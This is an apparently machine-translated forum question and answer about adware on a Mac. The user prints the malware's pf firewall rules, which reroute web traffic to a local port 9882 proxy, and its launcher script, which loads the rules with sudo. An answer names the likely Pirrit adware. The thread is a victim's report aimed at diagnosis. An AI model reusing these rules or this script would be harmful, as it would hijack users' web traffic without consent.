伪疏水性过程 Mac

伪疏水性过程 Mac

最近,我开始注意到,当我在 MBP 10.10.5 Yosemite 上浏览网页时,Chrome Canary 版本 53 正在打开一个新选项卡或某些页面未打开......此选项卡将我重定向到随机页面。

我启动了防火墙,发现一个名为 pseudohydrophobia 的进程正在尝试打开一个传入连接

/etc/pseudohydrophobia.conf

    rdr pass inet proto tcp from en0 to any port 80 -> 127.0.0.1 port 9882
    pass out on en0 route-to lo0  inet proto tcp from en0 to any port 80 keep state
    pass out proto tcp all user volutate

/etc/pseudohydrophobia.sh

#!/bin/sh

if [ -a /Library/pseudohydrophobia/Contents/MacOS/pseudohydrophobia ];
then
sleep 10
sudo pfctl -evf /etc/pseudohydrophobia.conf
sudo -u volutate /Library/pseudohydrophobia/Contents/MacOS/pseudohydrophobia
fi
exit 0

端口:

netstat -an | grep 9882
tcp4       0      0  *.9882                 *.*                    LISTEN  

/etc/pseudohydrophobia.conf

rdr pass inet proto tcp from en0 to any port 80 -> 127.0.0.1 port 9882
pass out on en0 route-to lo0  inet proto tcp from en0 to any port 80 keep state
pass out proto tcp all user volutate

我将删除所有这些脚本和二进制文件但想发布它,因为没有找到任何 Google 参考。

答案1

看一眼https://objective-see.com/blog/blog_0x0E.html

侵入性跨平台广告软件分析;OSX/Pirrit

它可能是 Pirrit 恶意软件。

用户名volutate和文件名(pseudohydrophobia)无疑是随机生成的,但端口号 9882 是相同的......

相关内容